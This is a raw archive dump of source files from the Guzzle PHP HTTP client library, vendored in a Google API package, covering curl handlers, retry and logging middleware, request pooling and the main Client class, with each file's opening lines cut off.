retryFailedRewind(callable $handler, EasyHandle $easy, array $ctx): PromiseInterface { try { // Only rewind if the body has been read from. $body = $easy->request->getBody(); if ($body->tell() > 0) { $body->rewind(); } } catch (\RuntimeException $e) { $ctx['error'] = 'The connection unexpectedly failed without ' .'providing an error. The request would have been retried, ' .'but attempting to rewind the request body failed. ' .'Exception: '.$e; return self::createRejection($easy, $ctx); } // Retry no more than 3 times before giving up. if (!isset($easy->options['_curl_retries'])) { $easy->options['_curl_retries'] = 1; } elseif ($easy->options['_curl_retries'] == 2) { $ctx['error'] = 'The cURL request was retried 3 times ' .'and did not succeed. The most likely reason for the failure ' .'is that cURL was unable to rewind the body of the request ' .'and subsequent retries resulted in the same error. Turn on ' .'the debug option to see what went wrong. See ' .'https://bugs.php.net/bug.php?id=47204 for more information.'; return self::createRejection($easy, $ctx); } else { ++$easy->options['_curl_retries']; } return $handler($easy->request, $easy->options); } private function createHeaderFn(EasyHandle $easy): callable { if (isset($easy->options['on_headers'])) { $onHeaders = $easy->options['on_headers']; if (!\is_callable($onHeaders)) { throw new \InvalidArgumentException('on_headers must be callable'); } } else { $onHeaders = null; } return static function ($ch, $h) use ( $onHeaders, $easy, &$startingResponse ) { $value = \trim($h); if ($value === '') { $startingResponse = true; try { $easy->createResponse(); } catch (\Exception $e) { $easy->createResponseException = $e; return -1; } if ($onHeaders !== null) { try { $onHeaders($easy->response); } catch (\Exception $e) { // Associate the exception with the handle and trigger // a curl header write error by returning 0. $easy->onHeadersException = $e; return -1; } } } elseif ($startingResponse) { $startingResponse = false; $easy->headers = [$value]; } else { $easy->headers[] = $value; } return \strlen($h); }; } public function __destruct() { foreach ($this->handles as $id => $handle) { \curl_close($handle); unset($this->handles[$id]); } } } google-api/vendor/guzzlehttp/guzzle/src/Handler/CurlHandler.php000064400000002462147600400120020702 0ustar00factory = $options['handle_factory'] ?? new CurlFactory(3); } public function __invoke(RequestInterface $request, array $options): PromiseInterface { if (isset($options['delay'])) { \usleep($options['delay'] * 1000); } $easy = $this->factory->create($request, $options); \curl_exec($easy->handle); $easy->errno = \curl_errno($easy->handle); return CurlFactory::finish($this, $easy, $this->factory); } } google-api/vendor/guzzlehttp/guzzle/src/Handler/CurlMultiHandler.php000064400000017527147600400120021725 0ustar00 An array of delay times, indexed by handle id in `addRequest`. * * @see CurlMultiHandler::addRequest */ private $delays = []; /** * @var array An associative array of CURLMOPT_* options and corresponding values for curl_multi_setopt() */ private $options = []; /** @var resource|\CurlMultiHandle */ private $_mh; /** * This handler accepts the following options: * * - handle_factory: An optional factory used to create curl handles * - select_timeout: Optional timeout (in seconds) to block before timing * out while selecting curl handles. Defaults to 1 second. * - options: An associative array of CURLMOPT_* options and * corresponding values for curl_multi_setopt() */ public function __construct(array $options = []) { $this->factory = $options['handle_factory'] ?? new CurlFactory(50); if (isset($options['select_timeout'])) { $this->selectTimeout = $options['select_timeout']; } elseif ($selectTimeout = Utils::getenv('GUZZLE_CURL_SELECT_TIMEOUT')) { @trigger_error('Since guzzlehttp/guzzle 7.2.0: Using environment variable GUZZLE_CURL_SELECT_TIMEOUT is deprecated. Use option "select_timeout" instead.', \E_USER_DEPRECATED); $this->selectTimeout = (int) $selectTimeout; } else { $this->selectTimeout = 1; } $this->options = $options['options'] ?? []; // unsetting the property forces the first access to go through // __get(). unset($this->_mh); } /** * @param string $name * * @return resource|\CurlMultiHandle * * @throws \BadMethodCallException when another field as `_mh` will be gotten * @throws \RuntimeException when curl can not initialize a multi handle */ public function __get($name) { if ($name !== '_mh') { throw new \BadMethodCallException("Can not get other property as '_mh'."); } $multiHandle = \curl_multi_init(); if (false === $multiHandle) { throw new \RuntimeException('Can not initialize curl multi handle.'); } $this->_mh = $multiHandle; foreach ($this->options as $option => $value) { // A warning is raised in case of a wrong option. curl_multi_setopt($this->_mh, $option, $value); } return $this->_mh; } public function __destruct() { if (isset($this->_mh)) { \curl_multi_close($this->_mh); unset($this->_mh); } } public function __invoke(RequestInterface $request, array $options): PromiseInterface { $easy = $this->factory->create($request, $options); $id = (int) $easy->handle; $promise = new Promise( [$this, 'execute'], function () use ($id) { return $this->cancel($id); } ); $this->addRequest(['easy' => $easy, 'deferred' => $promise]); return $promise; } /** * Ticks the curl event loop. */ public function tick(): void { // Add any delayed handles if needed. if ($this->delays) { $currentTime = Utils::currentTime(); foreach ($this->delays as $id => $delay) { if ($currentTime >= $delay) { unset($this->delays[$id]); \curl_multi_add_handle( $this->_mh, $this->handles[$id]['easy']->handle ); } } } // Step through the task queue which may add additional requests. P\Utils::queue()->run(); if ($this->active && \curl_multi_select($this->_mh, $this->selectTimeout) === -1) { // Perform a usleep if a select returns -1. // See: https://bugs.php.net/bug.php?id=61141 \usleep(250); } while (\curl_multi_exec($this->_mh, $this->active) === \CURLM_CALL_MULTI_PERFORM) { } $this->processMessages(); } /** * Runs until all outstanding connections have completed. */ public function execute(): void { $queue = P\Utils::queue(); while ($this->handles || !$queue->isEmpty()) { // If there are no transfers, then sleep for the next delay if (!$this->active && $this->delays) { \usleep($this->timeToNext()); } $this->tick(); } } private function addRequest(array $entry): void { $easy = $entry['easy']; $id = (int) $easy->handle; $this->handles[$id] = $entry; if (empty($easy->options['delay'])) { \curl_multi_add_handle($this->_mh, $easy->handle); } else { $this->delays[$id] = Utils::currentTime() + ($easy->options['delay'] / 1000); } } /** * Cancels a handle from sending and removes references to it. * * @param int $id Handle ID to cancel and remove. * * @return bool True on success, false on failure. */ private function cancel($id): bool { if (!is_int($id)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing an integer to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } // Cannot cancel if it has been processed. if (!isset($this->handles[$id])) { return false; } $handle = $this->handles[$id]['easy']->handle; unset($this->delays[$id], $this->handles[$id]); \curl_multi_remove_handle($this->_mh, $handle); \curl_close($handle); return true; } private function processMessages(): void { while ($done = \curl_multi_info_read($this->_mh)) { if ($done['msg'] !== \CURLMSG_DONE) { // if it's not done, then it would be premature to remove the handle. ref https://github.com/guzzle/guzzle/pull/2892#issuecomment-945150216 continue; } $id = (int) $done['handle']; \curl_multi_remove_handle($this->_mh, $done['handle']); if (!isset($this->handles[$id])) { // Probably was cancelled. continue; } $entry = $this->handles[$id]; unset($this->handles[$id], $this->delays[$id]); $entry['easy']->errno = $done['result']; $entry['deferred']->resolve( CurlFactory::finish($this, $entry['easy'], $this->factory) ); } } private function timeToNext(): int { $currentTime = Utils::currentTime(); $nextTime = \PHP_INT_MAX; foreach ($this->delays as $time) { if ($time < $nextTime) { $nextTime = $time; } } return ((int) \max(0, $nextTime - $currentTime)) * 1000000; } } google-api/vendor/guzzlehttp/guzzle/src/Utils.php000064400000031436147600400120016225 0ustar00getHost()) { $asciiHost = self::idnToAsci($uri->getHost(), $options, $info); if ($asciiHost === false) { $errorBitSet = $info['errors'] ?? 0; $errorConstants = array_filter(array_keys(get_defined_constants()), static function (string $name): bool { return substr($name, 0, 11) === 'IDNA_ERROR_'; }); $errors = []; foreach ($errorConstants as $errorConstant) { if ($errorBitSet & constant($errorConstant)) { $errors[] = $errorConstant; } } $errorMessage = 'IDN conversion failed'; if ($errors) { $errorMessage .= ' (errors: '.implode(', ', $errors).')'; } throw new InvalidArgumentException($errorMessage); } if ($uri->getHost() !== $asciiHost) { // Replace URI only if the ASCII version is different $uri = $uri->withHost($asciiHost); } } return $uri; } /** * @internal */ public static function getenv(string $name): ?string { if (isset($_SERVER[$name])) { return (string) $_SERVER[$name]; } if (\PHP_SAPI === 'cli' && ($value = \getenv($name)) !== false && $value !== null) { return (string) $value; } return null; } /** * @return string|false */ private static function idnToAsci(string $domain, int $options, ?array &$info = []) { if (\function_exists('idn_to_ascii') && \defined('INTL_IDNA_VARIANT_UTS46')) { return \idn_to_ascii($domain, $options, \INTL_IDNA_VARIANT_UTS46, $info); } throw new \Error('ext-idn or symfony/polyfill-intl-idn not loaded or too old'); } } google-api/vendor/guzzlehttp/guzzle/src/MessageFormatter.php000064400000017163147600400120020376 0ustar00>>>>>>>\n{request}\n<<<<<<<<\n{response}\n--------\n{error}"; public const SHORT = '[{ts}] "{method} {target} HTTP/{version}" {code}'; /** * @var string Template used to format log messages */ private $template; /** * @param string $template Log message template */ public function __construct(?string $template = self::CLF) { $this->template = $template ?: self::CLF; } /** * Returns a formatted message string. * * @param RequestInterface $request Request that was sent * @param ResponseInterface|null $response Response that was received * @param \Throwable|null $error Exception that was received */ public function format(RequestInterface $request, ResponseInterface $response = null, \Throwable $error = null): string { $cache = []; /** @var string */ return \preg_replace_callback( '/{\s*([A-Za-z_\-\.0-9]+)\s*}/', function (array $matches) use ($request, $response, $error, &$cache) { if (isset($cache[$matches[1]])) { return $cache[$matches[1]]; } $result = ''; switch ($matches[1]) { case 'request': $result = Psr7\Message::toString($request); break; case 'response': $result = $response ? Psr7\Message::toString($response) : ''; break; case 'req_headers': $result = \trim($request->getMethod() .' '.$request->getRequestTarget()) .' HTTP/'.$request->getProtocolVersion()."\r\n" .$this->headers($request); break; case 'res_headers': $result = $response ? \sprintf( 'HTTP/%s %d %s', $response->getProtocolVersion(), $response->getStatusCode(), $response->getReasonPhrase() )."\r\n".$this->headers($response) : 'NULL'; break; case 'req_body': $result = $request->getBody()->__toString(); break; case 'res_body': if (!$response instanceof ResponseInterface) { $result = 'NULL'; break; } $body = $response->getBody(); if (!$body->isSeekable()) { $result = 'RESPONSE_NOT_LOGGEABLE'; break; } $result = $response->getBody()->__toString(); break; case 'ts': case 'date_iso_8601': $result = \gmdate('c'); break; case 'date_common_log': $result = \date('d/M/Y:H:i:s O'); break; case 'method': $result = $request->getMethod(); break; case 'version': $result = $request->getProtocolVersion(); break; case 'uri': case 'url': $result = $request->getUri()->__toString(); break; case 'target': $result = $request->getRequestTarget(); break; case 'req_version': $result = $request->getProtocolVersion(); break; case 'res_version': $result = $response ? $response->getProtocolVersion() : 'NULL'; break; case 'host': $result = $request->getHeaderLine('Host'); break; case 'hostname': $result = \gethostname(); break; case 'code': $result = $response ? $response->getStatusCode() : 'NULL'; break; case 'phrase': $result = $response ? $response->getReasonPhrase() : 'NULL'; break; case 'error': $result = $error ? $error->getMessage() : 'NULL'; break; default: // handle prefixed dynamic headers if (\strpos($matches[1], 'req_header_') === 0) { $result = $request->getHeaderLine(\substr($matches[1], 11)); } elseif (\strpos($matches[1], 'res_header_') === 0) { $result = $response ? $response->getHeaderLine(\substr($matches[1], 11)) : 'NULL'; } } $cache[$matches[1]] = $result; return $result; }, $this->template ); } /** * Get headers from message as string */ private function headers(MessageInterface $message): string { $result = ''; foreach ($message->getHeaders() as $name => $values) { $result .= $name.': '.\implode(', ', $values)."\r\n"; } return \trim($result); } } google-api/vendor/guzzlehttp/guzzle/src/functions.php000064400000013070147600400120017127 0ustar00truncateAt = $truncateAt; } /** * Returns a summarized message body. */ public function summarize(MessageInterface $message): ?string { return $this->truncateAt === null ? \GuzzleHttp\Psr7\Message::bodySummary($message) : \GuzzleHttp\Psr7\Message::bodySummary($message, $this->truncateAt); } } google-api/vendor/guzzlehttp/guzzle/src/BodySummarizerInterface.php000064400000000351147600400120021712 0ustar00 'http://www.foo.com/1.0/', * 'timeout' => 0, * 'allow_redirects' => false, * 'proxy' => '' * ]); * * Client configuration settings include the following options: * * - handler: (callable) Function that transfers HTTP requests over the * wire. The function is called with a Psr7\Http\Message\RequestInterface * and array of transfer options, and must return a * GuzzleHttp\Promise\PromiseInterface that is fulfilled with a * Psr7\Http\Message\ResponseInterface on success. * If no handler is provided, a default handler will be created * that enables all of the request options below by attaching all of the * default middleware to the handler. * - base_uri: (string|UriInterface) Base URI of the client that is merged * into relative URIs. Can be a string or instance of UriInterface. * - **: any request option * * @param array $config Client configuration settings. * * @see \GuzzleHttp\RequestOptions for a list of available request options. */ public function __construct(array $config = []) { if (!isset($config['handler'])) { $config['handler'] = HandlerStack::create(); } elseif (!\is_callable($config['handler'])) { throw new InvalidArgumentException('handler must be a callable'); } // Convert the base_uri to a UriInterface if (isset($config['base_uri'])) { $config['base_uri'] = Psr7\Utils::uriFor($config['base_uri']); } $this->configureDefaults($config); } /** * @param string $method * @param array $args * * @return PromiseInterface|ResponseInterface * * @deprecated Client::__call will be removed in guzzlehttp/guzzle:8.0. */ public function __call($method, $args) { if (\count($args) < 1) { throw new InvalidArgumentException('Magic request methods require a URI and optional options array'); } $uri = $args[0]; $opts = $args[1] ?? []; return \substr($method, -5) === 'Async' ? $this->requestAsync(\substr($method, 0, -5), $uri, $opts) : $this->request($method, $uri, $opts); } /** * Asynchronously send an HTTP request. * * @param array $options Request options to apply to the given * request and to the transfer. See \GuzzleHttp\RequestOptions. */ public function sendAsync(RequestInterface $request, array $options = []): PromiseInterface { // Merge the base URI into the request URI if needed. $options = $this->prepareDefaults($options); return $this->transfer( $request->withUri($this->buildUri($request->getUri(), $options), $request->hasHeader('Host')), $options ); } /** * Send an HTTP request. * * @param array $options Request options to apply to the given * request and to the transfer. See \GuzzleHttp\RequestOptions. * * @throws GuzzleException */ public function send(RequestInterface $request, array $options = []): ResponseInterface { $options[RequestOptions::SYNCHRONOUS] = true; return $this->sendAsync($request, $options)->wait(); } /** * The HttpClient PSR (PSR-18) specify this method. * * {@inheritDoc} */ public function sendRequest(RequestInterface $request): ResponseInterface { $options[RequestOptions::SYNCHRONOUS] = true; $options[RequestOptions::ALLOW_REDIRECTS] = false; $options[RequestOptions::HTTP_ERRORS] = false; return $this->sendAsync($request, $options)->wait(); } /** * Create and send an asynchronous HTTP request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string $method HTTP method * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. See \GuzzleHttp\RequestOptions. */ public function requestAsync(string $method, $uri = '', array $options = []): PromiseInterface { $options = $this->prepareDefaults($options); // Remove request modifying parameter because it can be done up-front. $headers = $options['headers'] ?? []; $body = $options['body'] ?? null; $version = $options['version'] ?? '1.1'; // Merge the URI into the base URI. $uri = $this->buildUri(Psr7\Utils::uriFor($uri), $options); if (\is_array($body)) { throw $this->invalidBody(); } $request = new Psr7\Request($method, $uri, $headers, $body, $version); // Remove the option so that they are not doubly-applied. unset($options['headers'], $options['body'], $options['version']); return $this->transfer($request, $options); } /** * Create and send an HTTP request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string $method HTTP method. * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. See \GuzzleHttp\RequestOptions. * * @throws GuzzleException */ public function request(string $method, $uri = '', array $options = []): ResponseInterface { $options[RequestOptions::SYNCHRONOUS] = true; return $this->requestAsync($method, $uri, $options)->wait(); } /** * Get a client configuration option. * * These options include default request options of the client, a "handler" * (if utilized by the concrete client), and a "base_uri" if utilized by * the concrete client. * * @param string|null $option The config option to retrieve. * * @return mixed * * @deprecated Client::getConfig will be removed in guzzlehttp/guzzle:8.0. */ public function getConfig(string $option = null) { return $option === null ? $this->config : ($this->config[$option] ?? null); } private function buildUri(UriInterface $uri, array $config): UriInterface { if (isset($config['base_uri'])) { $uri = Psr7\UriResolver::resolve(Psr7\Utils::uriFor($config['base_uri']), $uri); } if (isset($config['idn_conversion']) && ($config['idn_conversion'] !== false)) { $idnOptions = ($config['idn_conversion'] === true) ? \IDNA_DEFAULT : $config['idn_conversion']; $uri = Utils::idnUriConvert($uri, $idnOptions); } return $uri->getScheme() === '' && $uri->getHost() !== '' ? $uri->withScheme('http') : $uri; } /** * Configures the default options for a client. */ private function configureDefaults(array $config): void { $defaults = [ 'allow_redirects' => RedirectMiddleware::$defaultSettings, 'http_errors' => true, 'decode_content' => true, 'verify' => true, 'cookies' => false, 'idn_conversion' => false, ]; // Use the standard Linux HTTP_PROXY and HTTPS_PROXY if set. // We can only trust the HTTP_PROXY environment variable in a CLI // process due to the fact that PHP has no reliable mechanism to // get environment variables that start with "HTTP_". if (\PHP_SAPI === 'cli' && ($proxy = Utils::getenv('HTTP_PROXY'))) { $defaults['proxy']['http'] = $proxy; } if ($proxy = Utils::getenv('HTTPS_PROXY')) { $defaults['proxy']['https'] = $proxy; } if ($noProxy = Utils::getenv('NO_PROXY')) { $cleanedNoProxy = \str_replace(' ', '', $noProxy); $defaults['proxy']['no'] = \explode(',', $cleanedNoProxy); } $this->config = $config + $defaults; if (!empty($config['cookies']) && $config['cookies'] === true) { $this->config['cookies'] = new CookieJar(); } // Add the default user-agent header. if (!isset($this->config['headers'])) { $this->config['headers'] = ['User-Agent' => Utils::defaultUserAgent()]; } else { // Add the User-Agent header if one was not already set. foreach (\array_keys($this->config['headers']) as $name) { if (\strtolower($name) === 'user-agent') { return; } } $this->config['headers']['User-Agent'] = Utils::defaultUserAgent(); } } /** * Merges default options into the array. * * @param array $options Options to modify by reference */ private function prepareDefaults(array $options): array { $defaults = $this->config; if (!empty($defaults['headers'])) { // Default headers are only added if they are not present. $defaults['_conditional'] = $defaults['headers']; unset($defaults['headers']); } // Special handling for headers is required as they are added as // conditional headers and as headers passed to a request ctor. if (\array_key_exists('headers', $options)) { // Allows default headers to be unset. if ($options['headers'] === null) { $defaults['_conditional'] = []; unset($options['headers']); } elseif (!\is_array($options['headers'])) { throw new InvalidArgumentException('headers must be an array'); } } // Shallow merge defaults underneath options. $result = $options + $defaults; // Remove null values. foreach ($result as $k => $v) { if ($v === null) { unset($result[$k]); } } return $result; } /** * Transfers the given request and applies request options. * * The URI of the request is not modified and the request options are used * as-is without merging in default options. * * @param array $options See \GuzzleHttp\RequestOptions. */ private function transfer(RequestInterface $request, array $options): PromiseInterface { $request = $this->applyOptions($request, $options); /** @var HandlerStack $handler */ $handler = $options['handler']; try { return P\Create::promiseFor($handler($request, $options)); } catch (\Exception $e) { return P\Create::rejectionFor($e); } } /** * Applies the array of request options to a request. */ private function applyOptions(RequestInterface $request, array &$options): RequestInterface { $modify = [ 'set_headers' => [], ]; if (isset($options['headers'])) { if (array_keys($options['headers']) === range(0, count($options['headers']) - 1)) { throw new InvalidArgumentException('The headers array must have header name as keys.'); } $modify['set_headers'] = $options['headers']; unset($options['headers']); } if (isset($options['form_params'])) { if (isset($options['multipart'])) { throw new InvalidArgumentException('You cannot use ' .'form_params and multipart at the same time. Use the ' .'form_params option if you want to send application/' .'x-www-form-urlencoded requests, and the multipart ' .'option to send multipart/form-data requests.'); } $options['body'] = \http_build_query($options['form_params'], '', '&'); unset($options['form_params']); // Ensure that we don't have the header in different case and set the new value. $options['_conditional'] = Psr7\Utils::caselessRemove(['Content-Type'], $options['_conditional']); $options['_conditional']['Content-Type'] = 'application/x-www-form-urlencoded'; } if (isset($options['multipart'])) { $options['body'] = new Psr7\MultipartStream($options['multipart']); unset($options['multipart']); } if (isset($options['json'])) { $options['body'] = Utils::jsonEncode($options['json']); unset($options['json']); // Ensure that we don't have the header in different case and set the new value. $options['_conditional'] = Psr7\Utils::caselessRemove(['Content-Type'], $options['_conditional']); $options['_conditional']['Content-Type'] = 'application/json'; } if (!empty($options['decode_content']) && $options['decode_content'] !== true ) { // Ensure that we don't have the header in different case and set the new value. $options['_conditional'] = Psr7\Utils::caselessRemove(['Accept-Encoding'], $options['_conditional']); $modify['set_headers']['Accept-Encoding'] = $options['decode_content']; } if (isset($options['body'])) { if (\is_array($options['body'])) { throw $this->invalidBody(); } $modify['body'] = Psr7\Utils::streamFor($options['body']); unset($options['body']); } if (!empty($options['auth']) && \is_array($options['auth'])) { $value = $options['auth']; $type = isset($value[2]) ? \strtolower($value[2]) : 'basic'; switch ($type) { case 'basic': // Ensure that we don't have the header in different case and set the new value. $modify['set_headers'] = Psr7\Utils::caselessRemove(['Authorization'], $modify['set_headers']); $modify['set_headers']['Authorization'] = 'Basic ' .\base64_encode("$value[0]:$value[1]"); break; case 'digest': // @todo: Do not rely on curl $options['curl'][\CURLOPT_HTTPAUTH] = \CURLAUTH_DIGEST; $options['curl'][\CURLOPT_USERPWD] = "$value[0]:$value[1]"; break; case 'ntlm': $options['curl'][\CURLOPT_HTTPAUTH] = \CURLAUTH_NTLM; $options['curl'][\CURLOPT_USERPWD] = "$value[0]:$value[1]"; break; } } if (isset($options['query'])) { $value = $options['query']; if (\is_array($value)) { $value = \http_build_query($value, '', '&', \PHP_QUERY_RFC3986); } if (!\is_string($value)) { throw new InvalidArgumentException('query must be a string or array'); } $modify['query'] = $value; unset($options['query']); } // Ensure that sink is not an invalid value. if (isset($options['sink'])) { // TODO: Add more sink validation? if (\is_bool($options['sink'])) { throw new InvalidArgumentException('sink must not be a boolean'); } } if (isset($options['version'])) { $modify['version'] = $options['version']; } $request = Psr7\Utils::modifyRequest($request, $modify); if ($request->getBody() instanceof Psr7\MultipartStream) { // Use a multipart/form-data POST if a Content-Type is not set. // Ensure that we don't have the header in different case and set the new value. $options['_conditional'] = Psr7\Utils::caselessRemove(['Content-Type'], $options['_conditional']); $options['_conditional']['Content-Type'] = 'multipart/form-data; boundary=' .$request->getBody()->getBoundary(); } // Merge in conditional headers if they are not present. if (isset($options['_conditional'])) { // Build up the changes so it's in a single clone of the message. $modify = []; foreach ($options['_conditional'] as $k => $v) { if (!$request->hasHeader($k)) { $modify['set_headers'][$k] = $v; } } $request = Psr7\Utils::modifyRequest($request, $modify); // Don't pass this internal value along to middleware/handlers. unset($options['_conditional']); } return $request; } /** * Return an InvalidArgumentException with pre-set message. */ private function invalidBody(): InvalidArgumentException { return new InvalidArgumentException('Passing in the "body" request ' .'option as an array to send a request is not supported. ' .'Please use the "form_params" request option to send a ' .'application/x-www-form-urlencoded request, or the "multipart" ' .'request option to send a multipart/form-data request.'); } } google-api/vendor/guzzlehttp/guzzle/src/Pool.php000064400000011154147600400120016031 0ustar00 $rfn) { if ($rfn instanceof RequestInterface) { yield $key => $client->sendAsync($rfn, $opts); } elseif (\is_callable($rfn)) { yield $key => $rfn($opts); } else { throw new \InvalidArgumentException('Each value yielded by the iterator must be a Psr7\Http\Message\RequestInterface or a callable that returns a promise that fulfills with a Psr7\Message\Http\ResponseInterface object.'); } } }; $this->each = new EachPromise($requests(), $config); } /** * Get promise */ public function promise(): PromiseInterface { return $this->each->promise(); } /** * Sends multiple requests concurrently and returns an array of responses * and exceptions that uses the same ordering as the provided requests. * * IMPORTANT: This method keeps every request and response in memory, and * as such, is NOT recommended when sending a large number or an * indeterminate number of requests concurrently. * * @param ClientInterface $client Client used to send the requests * @param array|\Iterator $requests Requests to send concurrently. * @param array $options Passes through the options available in * {@see \GuzzleHttp\Pool::__construct} * * @return array Returns an array containing the response or an exception * in the same order that the requests were sent. * * @throws \InvalidArgumentException if the event format is incorrect. */ public static function batch(ClientInterface $client, $requests, array $options = []): array { $res = []; self::cmpCallback($options, 'fulfilled', $res); self::cmpCallback($options, 'rejected', $res); $pool = new static($client, $requests, $options); $pool->promise()->wait(); \ksort($res); return $res; } /** * Execute callback(s) */ private static function cmpCallback(array &$options, string $name, array &$results): void { if (!isset($options[$name])) { $options[$name] = static function ($v, $k) use (&$results) { $results[$k] = $v; }; } else { $currentFn = $options[$name]; $options[$name] = static function ($v, $k) use (&$results, $currentFn) { $currentFn($v, $k); $results[$k] = $v; }; } } } google-api/vendor/guzzlehttp/guzzle/src/RetryMiddleware.php000064400000007035147600400120020226 0ustar00decider = $decider; $this->nextHandler = $nextHandler; $this->delay = $delay ?: __CLASS__.'::exponentialDelay'; } /** * Default exponential backoff delay function. * * @return int milliseconds. */ public static function exponentialDelay(int $retries): int { return (int) 2 ** ($retries - 1) * 1000; } public function __invoke(RequestInterface $request, array $options): PromiseInterface { if (!isset($options['retries'])) { $options['retries'] = 0; } $fn = $this->nextHandler; return $fn($request, $options) ->then( $this->onFulfilled($request, $options), $this->onRejected($request, $options) ); } /** * Execute fulfilled closure */ private function onFulfilled(RequestInterface $request, array $options): callable { return function ($value) use ($request, $options) { if (!($this->decider)( $options['retries'], $request, $value, null )) { return $value; } return $this->doRetry($request, $options, $value); }; } /** * Execute rejected closure */ private function onRejected(RequestInterface $req, array $options): callable { return function ($reason) use ($req, $options) { if (!($this->decider)( $options['retries'], $req, null, $reason )) { return P\Create::rejectionFor($reason); } return $this->doRetry($req, $options); }; } private function doRetry(RequestInterface $request, array $options, ResponseInterface $response = null): PromiseInterface { $options['delay'] = ($this->delay)(++$options['retries'], $response, $request); return $this($request, $options); } } google-api/vendor/guzzlehttp/guzzle/src/RequestOptions.php000064400000025332147600400120020127 0ustar00withCookieHeader($request); return $handler($request, $options) ->then( static function (ResponseInterface $response) use ($cookieJar, $request): ResponseInterface { $cookieJar->extractCookies($request, $response); return $response; } ); }; }; } /** * Middleware that throws exceptions for 4xx or 5xx responses when the * "http_errors" request option is set to true. * * @param BodySummarizerInterface|null $bodySummarizer The body summarizer to use in exception messages. * * @return callable(callable): callable Returns a function that accepts the next handler. */ public static function httpErrors(BodySummarizerInterface $bodySummarizer = null): callable { return static function (callable $handler) use ($bodySummarizer): callable { return static function ($request, array $options) use ($handler, $bodySummarizer) { if (empty($options['http_errors'])) { return $handler($request, $options); } return $handler($request, $options)->then( static function (ResponseInterface $response) use ($request, $bodySummarizer) { $code = $response->getStatusCode(); if ($code < 400) { return $response; } throw RequestException::create($request, $response, null, [], $bodySummarizer); } ); }; }; } /** * Middleware that pushes history data to an ArrayAccess container. * * @param array|\ArrayAccess $container Container to hold the history (by reference). * * @return callable(callable): callable Returns a function that accepts the next handler. * * @throws \InvalidArgumentException if container is not an array or ArrayAccess. */ public static function history(&$container): callable { if (!\is_array($container) && !$container instanceof \ArrayAccess) { throw new \InvalidArgumentException('history container must be an array or object implementing ArrayAccess'); } return static function (callable $handler) use (&$container): callable { return static function (RequestInterface $request, array $options) use ($handler, &$container) { return $handler($request, $options)->then( static function ($value) use ($request, &$container, $options) { $container[] = [ 'request' => $request, 'response' => $value, 'error' => null, 'options' => $options, ]; return $value; }, static function ($reason) use ($request, &$container, $options) { $container[] = [ 'request' => $request, 'response' => null, 'error' => $reason, 'options' => $options, ]; return P\Create::rejectionFor($reason); } ); }; }; } /** * Middleware that invokes a callback before and after sending a request. * * The provided listener cannot modify or alter the response. It simply * "taps" into the chain to be notified before returning the promise. The * before listener accepts a request and options array, and the after * listener accepts a request, options array, and response promise. * * @param callable $before Function to invoke before forwarding the request. * @param callable $after Function invoked after forwarding. * * @return callable Returns a function that accepts the next handler. */ public static function tap(callable $before = null, callable $after = null): callable { return static function (callable $handler) use ($before, $after): callable { return static function (RequestInterface $request, array $options) use ($handler, $before, $after) { if ($before) { $before($request, $options); } $response = $handler($request, $options); if ($after) { $after($request, $options, $response); } return $response; }; }; } /** * Middleware that handles request redirects. * * @return callable Returns a function that accepts the next handler. */ public static function redirect(): callable { return static function (callable $handler): RedirectMiddleware { return new RedirectMiddleware($handler); }; } /** * Middleware that retries requests based on the boolean result of * invoking the provided "decider" function. * * If no delay function is provided, a simple implementation of exponential * backoff will be utilized. * * @param callable $decider Function that accepts the number of retries, * a request, [response], and [exception] and * returns true if the request is to be retried. * @param callable $delay Function that accepts the number of retries and * returns the number of milliseconds to delay. * * @return callable Returns a function that accepts the next handler. */ public static function retry(callable $decider, callable $delay = null): callable { return static function (callable $handler) use ($decider, $delay): RetryMiddleware { return new RetryMiddleware($decider, $handler, $delay); }; } /** * Middleware that logs requests, responses, and errors using a message * formatter. * * @phpstan-param \Psr\Log\LogLevel::* $logLevel Level at which to log requests. * * @param LoggerInterface $logger Logs messages. * @param MessageFormatterInterface|MessageFormatter $formatter Formatter used to create message strings. * @param string $logLevel Level at which to log requests. * * @return callable Returns a function that accepts the next handler. */ public static function log(LoggerInterface $logger, $formatter, string $logLevel = 'info'): callable { // To be compatible with Guzzle 7.1.x we need to allow users to pass a MessageFormatter if (!$formatter instanceof MessageFormatter && !$formatter instanceof MessageFormatterInterface) { throw new \LogicException(sprintf('Argument 2 to %s::log() must be of type %s', self::class, MessageFormatterInterface::class)); } return static function (callable $handler) use ($logger, $formatter, $logLevel): callable { return static function (RequestInterface $request, array $options = []) use ($handler, $logger, $formatter, $logLevel) { return $handler($request, $options)->then( static function ($response) use ($logger, $request, $formatter, $logLevel): ResponseInterface { $message = $formatter->format($request, $response); $logger->log($logLevel, $message); return $response; }, static function ($reason) use ($logger, $request, $formatter): PromiseInterface { $response = $reason instanceof RequestException ? $reason->getResponse() : null; $message = $formatter->format($request, $response, P\Create::exceptionFor($reason)); $logger->error($message); return P\Create::rejectionFor($reason); } ); }; }; } /** * This middleware adds a default content-type if possible, a default * content-length or transfer-encoding header, and the expect header. */ public static function prepareBody(): callable { return static function (callable $handler): PrepareBodyMiddleware { return new PrepareBodyMiddleware($handler); }; } /** * Middleware that applies a map function to the request before passing to * the next handler. * * @param callable $fn Function that accepts a RequestInterface and returns * a RequestInterface. */ public static function mapRequest(callable $fn): callable { return static function (callable $handler) use ($fn): callable { return static function (RequestInterface $request, array $options) use ($handler, $fn) { return $handler($fn($request), $options); }; }; } /** * Middleware that applies a map function to the resolved promise's * response. * * @param callable $fn Function that accepts a ResponseInterface and * returns a ResponseInterface. */ public static function mapResponse(callable $fn): callable { return static function (callable $handler) use ($fn): callable { return static function (RequestInterface $request, array $options) use ($handler, $fn) { return $handler($request, $options)->then($fn); }; }; } } google-api/vendor/guzzlehttp/guzzle/src/TransferStats.php000064400000006152147600400120017725 0ustar00request = $request; $this->response = $response; $this->transferTime = $transferTime; $this->handlerErrorData = $handlerErrorData; $this->handlerStats = $handlerStats; } public function getRequest(): RequestInterface { return $this->request; } /** * Returns the response that was received (if any). */ public function getResponse(): ?ResponseInterface { return $this->response; } /** * Returns true if a response was received. */ public function hasResponse(): bool { return $this->response !== null; } /** * Gets handler specific error data. * * 